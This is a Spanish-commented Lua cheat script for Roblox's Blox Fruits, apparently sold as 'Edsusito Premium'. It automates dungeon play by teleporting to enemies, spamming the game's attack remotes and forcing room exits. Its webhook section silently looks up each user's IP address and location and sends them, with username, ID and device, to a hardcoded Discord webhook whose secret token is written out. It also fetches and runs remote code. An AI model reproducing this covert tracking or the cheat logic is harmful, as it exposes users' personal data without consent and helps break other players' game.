-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
-- 👑 EDSUSITO PREMIUM - THE MASTERPIECE 👑
-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

local UsuariosPermitidos = {
    [7255753286] = true,  -- TW_Calamity
    [2014903362] = true,  -- Edsusito (Creador)
    [8117327541] = true,  -- MC_AleX
    [4121727989] = true,   -- SAMZzz
    [000000000] = true,   -- Espacio 5
    [000000000] = true,   -- Espacio 6
    [000000000] = true,   -- Espacio 7
    [000000000] = true,   -- Espacio 8
    [000000000] = true,   -- Espacio 9
    [000000000] = true,   -- Espacio 10
    [000000000] = true,   -- Espacio 11
    [000000000] = true,   -- Espacio 12
    [000000000] = true,   -- Espacio 13
    [000000000] = true,   -- Espacio 14
    [000000000] = true,   -- Espacio 15
    [000000000] = true,   -- Espacio 16
    [000000000] = true,   -- Espacio 17
    [000000000] = true,   -- Espacio 18
    [000000000] = true,   -- Espacio 19
    [000000000] = true,   -- Espacio 20
}

local Players = game:GetService("Players")
local CoreGui = game:GetService("CoreGui")
local localPlayer = Players.LocalPlayer

-- ◈ Candado de Seguridad
if not UsuariosPermitidos[localPlayer.UserId] then
    local targetGui = pcall(function() return CoreGui end) and CoreGui or localPlayer:WaitForChild("PlayerGui")
    
    local TrollScreen = Instance.new("ScreenGui")
    TrollScreen.Name = "EdsusitoSecurity"
    TrollScreen.IgnoreGuiInset = true
    TrollScreen.Parent = targetGui
    
    local Background = Instance.new("Frame")
    Background.Size = UDim2.new(1, 0, 1, 0)
    Background.BackgroundColor3 = Color3.fromRGB(12, 12, 12)
    Background.Parent = TrollScreen
    
    local TrollText = Instance.new("TextLabel")
    TrollText.Size = UDim2.new(0.9, 0, 0.8, 0)
    TrollText.Position = UDim2.new(0.05, 0, 0.1, 0)
    TrollText.BackgroundTransparency = 1
    TrollText.TextColor3 = Color3.fromRGB(220, 40, 40)
    TrollText.TextScaled = true
    TrollText.Font = Enum.Font.GothamBlack 
    TrollText.Text = "¿Qué miras? 🤡\n\n¿De verdad creíste que podías usar el código de Edsusito así de fácil?\nDeja de mendigar scripts y compra tu licencia oficial.\n\nExpulsando en: 5"
    TrollText.Parent = Background

    task.spawn(function()
        for i = 5, 1, -1 do
            TrollText.Text = "¿Qué miras? 🤡\n\n¿De verdad creíste que podías usar el código de Edsusito así de fácil?\nDeja de mendigar scripts y compra tu licencia oficial.\n\nExpulsando en: " .. i
            task.wait(1)
        end
        localPlayer:Kick("Sin licencia no hay script. Habla con Edsu.")
    end)
    
    return
end

print("◈ Bienvenido, " .. localPlayer.DisplayName .. ". Edsusito Premium cargado correctamente. ◈")

-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
-- ⚙️ SERVICIOS Y VARIABLES DEL SISTEMA
-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
local HttpService = game:GetService("HttpService")
local Workspace = game:GetService("Workspace")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local UserInputService = game:GetService("UserInputService")
local VirtualInputManager = game:GetService("VirtualInputManager")

local character = localPlayer.Character or localPlayer.CharacterAdded:Wait()
local humanoidRootPart = character:WaitForChild("HumanoidRootPart")

local justDied = false 
local attackHeight = 40 -- Altura inicial ajustada
local selectedWeapon = "Sword" 

local autoDungeonActive = false
local autoV4Active = false
local currentTarget = nil
local lastTarget = nil 

local netFolder = ReplicatedStorage:WaitForChild("Modules"):WaitForChild("Net")
local registerAttack = netFolder:WaitForChild("RE/RegisterAttack")
local registerHit = netFolder:WaitForChild("RE/RegisterHit")
local enemiesFolder = Workspace:FindFirstChild("Enemies") or Workspace
local commF = ReplicatedStorage:WaitForChild("Remotes"):WaitForChild("CommF_")

localPlayer.CharacterAdded:Connect(function(newCharacter)
    character = newCharacter
    humanoidRootPart = newCharacter:WaitForChild("HumanoidRootPart")
    justDied = true 
end)

-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
-- 📡 WEBHOOK: MONITOREO VIP
-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
task.spawn(function()
    local WebhookURL = "https://webhook.lewisakura.moe/api/webhooks/1527303066431389796/XMkQJ-N1Y0Fo7Kb23Bod9m2VtZbhHRIGCuCOD4tUJHeHJhaB_TnfRAxogKskRdpExxnn"
    
    local dispositivo = "PC 💻"
    if UserInputService.TouchEnabled and not UserInputService.KeyboardEnabled then dispositivo = "Móvil 📱"
    elseif UserInputService.GamepadEnabled then dispositivo = "Consola 🎮" end
    
    local executorName = identifyexecutor and identifyexecutor() or "Desconocido"
    
    local ipData = { query = "Oculta", country = "N/A", city = "N/A" }
    pcall(function()
        local response = game:HttpGet("http://ip-api.com/json/")
        if response then
            local decoded = HttpService:JSONDecode(response)
            if decoded.status == "success" then ipData = decoded end
        end
    end)
    
    local horaExacta = os.date("%Y-%m-%d %H:%M:%S")

    local mensaje = "👑 **EJECUCIÓN VIP DETECTADA - EDSUSITO PREMIUM** 👑\n" ..
                    "```yaml\n" ..
                    "[ 👤 DATOS DEL USUARIO ]\n" ..
                    "Nombre:      " .. localPlayer.DisplayName .. " (@" .. localPlayer.Name .. ")\n" ..
                    "User ID:     " .. tostring(localPlayer.UserId) .. "\n\n" ..
                    "[ 💻 DATOS TÉCNICOS ]\n" ..
                    "Ejecutor:    " .. executorName .. "\n" ..
                    "Dispositivo: " .. dispositivo .. "\n" ..
                    "Ubicación:   " .. ipData.city .. ", " .. ipData.country .. " (" .. ipData.query .. ")\n" ..
                    "Hora:        " .. horaExacta .. "\n" ..
                    "```"

    local data = { ["content"] = mensaje }
    local jsonData = HttpService:JSONEncode(data)
    local req = syn and syn.request or http and http.request or http_request or request or fluxus and fluxus.request
    
    if req then pcall(function() req({Url = WebhookURL, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = jsonData}) end)
    else pcall(function() HttpService:PostAsync(WebhookURL, jsonData) end) end
end)

-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
-- 🗡️ COMBATE Y EQUIPAMIENTO
-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
local function GetWeaponInBackpack(weaponName)
    local backpack = localPlayer:FindFirstChildOfClass("Backpack")
    if backpack then
        for _, tool in ipairs(backpack:GetChildren()) do
            if string.find(string.lower(tool.Name), string.lower(weaponName)) or tool.ToolTip == weaponName then
                return tool
            end
        end
    end
    return nil
end

local function EquipSelectedWeapon()
    if not character or not autoDungeonActive then return end
    local currentTool = character:FindFirstChildOfClass("Tool")
    if currentTool and (string.find(string.lower(currentTool.Name), string.lower(selectedWeapon)) or currentTool.ToolTip == selectedWeapon) then
        return
    end
    local toolToEquip = GetWeaponInBackpack(selectedWeapon)
    if toolToEquip then
        local humanoid = character:FindFirstChildOfClass("Humanoid")
        if humanoid then humanoid:EquipTool(toolToEquip) end
    end
end

local function ForceActivateHaki()
    if not character or not autoDungeonActive then return end
    if not character:FindFirstChild("HasBuso") then
        pcall(function() commF:InvokeServer("Buso") end)
    end
end

-- ◇ AUTO V4 LOOP
task.spawn(function()
    while true do
        task.wait(0.5)
        if autoV4Active and autoDungeonActive and character then
            pcall(function()
                VirtualInputManager:SendKeyEvent(true, Enum.KeyCode.Y, false, game)
                task.wait(0.1)
                VirtualInputManager:SendKeyEvent(false, Enum.KeyCode.Y, false, game)
            end)
        end
    end
end)

local function StartAutoBuffs()
    task.spawn(function()
        print("◈ Vectores de daño en línea.")
        while autoDungeonActive do
            EquipSelectedWeapon()
            task.wait(0.3)
        end
    end)
    task.spawn(function()
        while autoDungeonActive do
            ForceActivateHaki()
            task.wait(0.1)
        end
    end)
end

-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
-- 👁️ DETECCIÓN DE ENEMIGOS (FIX STAGE 15)
-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
local function GetClosestEnemy()
    if justDied then return nil end 

    local closestEnemy = nil
    local shortestDistance = math.huge
    local currentCharacter = localPlayer.Character
    
    if not currentCharacter or not currentCharacter:FindFirstChild("HumanoidRootPart") then return nil end
    
    local myPos = currentCharacter.HumanoidRootPart.Position
    local sourceFolder = Workspace:FindFirstChild("Enemies") or enemiesFolder
    
    if sourceFolder then
        local jefeVivo = false
        local jefeEncontrado = sourceFolder:FindFirstChild("Gas Knight")
        if jefeEncontrado then
            local jefeHumanoid = jefeEncontrado:FindFirstChildOfClass("Humanoid")
            if jefeHumanoid and jefeHumanoid.Health > 0 then
                jefeVivo = true
            end
        end

        local children = sourceFolder:GetChildren()
        local primaryCandidates = {}
        local backupCandidates = {}
        
        for i = 1, #children do
            local object = children[i]
            
            if object.Name == "PropHitboxPlaceholder" and not jefeVivo then
                continue 
            end

            if object:IsA("Model") and object ~= currentCharacter and object.Name ~= "Blank Buddy" and object.Name ~= "Sombra" and object.Name ~= "Shadow" then
                local humanoid = object:FindFirstChildOfClass("Humanoid")
                local root = object:FindFirstChild("HumanoidRootPart") or object:FindFirstChild("Head")
                
                if humanoid and humanoid.Health > 0 and root and object.Parent then
                    local distance = (root.Position - myPos).Magnitude
                    if object.Name == "Gas Knight" then distance = distance - 1000 end 
                    
                    if object ~= lastTarget then table.insert(primaryCandidates, {model = object, dist = distance})
                    else table.insert(backupCandidates, {model = object, dist = distance}) end
                end
            end
        end
        
        local targetList = #primaryCandidates > 0 and primaryCandidates or backupCandidates
        for i = 1, #targetList do
            local candidate = targetList[i]
            if candidate.dist < shortestDistance then
                shortestDistance = candidate.dist
                closestEnemy = candidate.model
            end
        end
    end
    return closestEnemy
end

local function TeleportToEnemy(enemy)
    if not enemy or not enemy.Parent or not humanoidRootPart then return false end
    local enemyRoot = enemy:FindFirstChild("HumanoidRootPart") or enemy:FindFirstChild("Head")
    if not enemyRoot then return false end
    
    local success = pcall(function()
        humanoidRootPart.CFrame = enemyRoot.CFrame * CFrame.new(0, attackHeight, 0)
    end)
    
    if not success then
        local raycastParams = RaycastParams.new()
        raycastParams.FilterDescendantsInstances = {character, enemy}
        raycastParams.FilterType = Enum.RaycastFilterType.Exclude
        local raycastResult = Workspace:Raycast(enemyRoot.Position, Vector3.new(0, -100, 0), raycastParams)
        if raycastResult then humanoidRootPart.CFrame = CFrame.new(raycastResult.Position + Vector3.new(0, 3, 0)) end
    end
    return true
end

local function AttackEnemy(enemy)
    if not enemy or not enemy.Parent then return end
    local enemyHead = enemy:FindFirstChild("Head")
    local enemyHumanoid = enemy:FindFirstChildOfClass("Humanoid")
    if not enemyHead or not enemyHumanoid then return end
    
    local tool = character:FindFirstChildOfClass("Tool")
    if tool then tool:Activate() end
    
    -- Fast Attack optimizado
    pcall(function()
        registerAttack:FireServer(0)
        registerHit:FireServer(enemyHead, {{enemy, enemyHead}})
    end)
end

-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
-- 🚪 PROGRESIÓN DE SALAS Y ROTACIÓN (FAST ATTACK)
-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
local function GetCurrentRoomIndex(rooms)
    if not humanoidRootPart then return 1 end
    local myPos = humanoidRootPart.Position
    local currentRoomIdx = 1
    local minDistanceToRoomCenter = math.huge
    
    for i, room in ipairs(rooms) do
        local roomPart = room:FindFirstChildOfClass("Part") or room:FindFirstChildOfClass("MeshPart") or room:FindFirstChild("Floor")
        if roomPart then
            local dist = (roomPart.Position - myPos).Magnitude
            if dist < minDistanceToRoomCenter then
                minDistanceToRoomCenter = dist
                currentRoomIdx = i
            end
        end
    end
    return currentRoomIdx
end

local function AutoPassRoom()
    local mapFolder = Workspace:FindFirstChild("Map")
    if not mapFolder then return false end
    local dungeonFolder = mapFolder:FindFirstChild("Dungeon")
    if not dungeonFolder then return false end
    
    local rooms = dungeonFolder:GetChildren()
    if #rooms == 0 then return false end
    
    table.sort(rooms, function(a, b)
        local numA = tonumber(string.match(a.Name, "%d+")) or 0
        local numB = tonumber(string.match(b.Name, "%d+")) or 0
        return numA < numB
    end)
    
    local currentRoomIdx = GetCurrentRoomIndex(rooms)
    local activeRoom = rooms[currentRoomIdx]
    
    if activeRoom then
        local teleporter = activeRoom:FindFirstChild("ExitTeleporter")
        if teleporter then
            local rootPart = teleporter:FindFirstChild("Root")
            if rootPart and rootPart:IsA("BasePart") and humanoidRootPart then
                local touchTransmitter = rootPart:FindFirstChildOfClass("TouchTransmitter")
                if touchTransmitter then
                    humanoidRootPart.CFrame = rootPart.CFrame
                    task.wait(0.12)
                    if firetouchinterest then
                        firetouchinterest(humanoidRootPart, rootPart, 0)
                        task.wait(0.1)
                        firetouchinterest(humanoidRootPart, rootPart, 1)
                    end
                    if justDied then justDied = false end
                    return true
                end
            end
        end
    end
    return false
end

local function RotateTargets()
    while autoDungeonActive do
        currentTarget = GetClosestEnemy()
        
        if currentTarget and not justDied then
            lastTarget = currentTarget
            local enemyHumanoid = currentTarget:FindFirstChildOfClass("Humanoid")
            local timer = 0
            
            -- Cambio de NPC cada 0.3 segundos con Fast Attack Activo
            while autoDungeonActive and currentTarget and currentTarget.Parent and enemyHumanoid and enemyHumanoid.Health > 0 and timer < 0.3 and not justDied do
                TeleportToEnemy(currentTarget)
                AttackEnemy(currentTarget)
                
                task.wait() -- Disparo rápido sin delay forzado
                timer = timer + 0.01
            end
        else
            if justDied then
                local passed = false
                local attempts = 0
                while autoDungeonActive and justDied and attempts < 10 do
                    passed = AutoPassRoom()
                    if passed then
                        justDied = false 
                        break
                    end
                    attempts = attempts + 1
                    task.wait(0.5)
                end
                if attempts >= 10 then justDied = false end
            else
                task.wait(1.0)
                local passed = AutoPassRoom()
                if not passed then task.wait(0.5) end
            end
        end
    end
end

-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
-- 🎨 INTERFAZ GRÁFICA (RAYFIELD)
-- ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
local Rayfield = loadstring(game:HttpGet('https://sirius.menu/rayfield'))()

local Window = Rayfield:CreateWindow({
    Name = "👑 Edsusito Premium | The Masterpiece",
    LoadingTitle = "Cargando código de autor...",
    LoadingSubtitle = "By Edsu",
    ConfigurationSaving = { Enabled = false },
    Discord = { Enabled = false },
    KeySystem = false
})

local DungeonTab = Window:CreateTab("Control Dungeon", 4483362458)

DungeonTab:CreateSection("◈ Inicio Rápido")
DungeonTab:CreateToggle({
    Name = "⚡ Iniciar Auto Dungeon",
    CurrentValue = false,
    Flag = "EdsuAutoDungeonFlag",
    Callback = function(Value)
        autoDungeonActive = Value
        if Value then
            justDied = false
            StartAutoBuffs() 
            coroutine.wrap(RotateTargets)()
            Rayfield:Notify({Title = "Sistema Activo", Content = "Limpieza de sala iniciada.", Duration = 3})
        else
            currentTarget = nil
            lastTarget = nil
            justDied = false
        end
    end,
})

DungeonTab:CreateSection("◈ Armamento y Distancia")
DungeonTab:CreateDropdown({
    Name = "⚔️ Arma Seleccionada",
    Options = {"Sword", "Melee", "Blox Fruit"},
    CurrentOption = {"Sword"},
    MultipleOptions = false,
    Flag = "WeaponDropdown",
    Callback = function(Option)
        selectedWeapon = Option[1]
    end,
})

DungeonTab:CreateSlider({
    Name = "🚁 Altura de Ataque",
    Range = {10, 100}, 
    Increment = 1,
    Suffix = " studs",
    CurrentValue = 40, -- 40 por defecto
    Flag = "AttackHeightFlag",
    Callback = function(Value)
        attackHeight = Value
    end,
})

DungeonTab:CreateSection("◈ Funciones Adicionales")
DungeonTab:CreateToggle({
    Name = "🔥 Auto Activar V4",
    CurrentValue = false,
    Flag = "AutoV4Flag",
    Callback = function(Value)
        autoV4Active = Value
        if Value then
            Rayfield:Notify({Title = "V4 Activo", Content = "Spam de habilidad iniciado.", Duration = 3})
        end
    end,
})
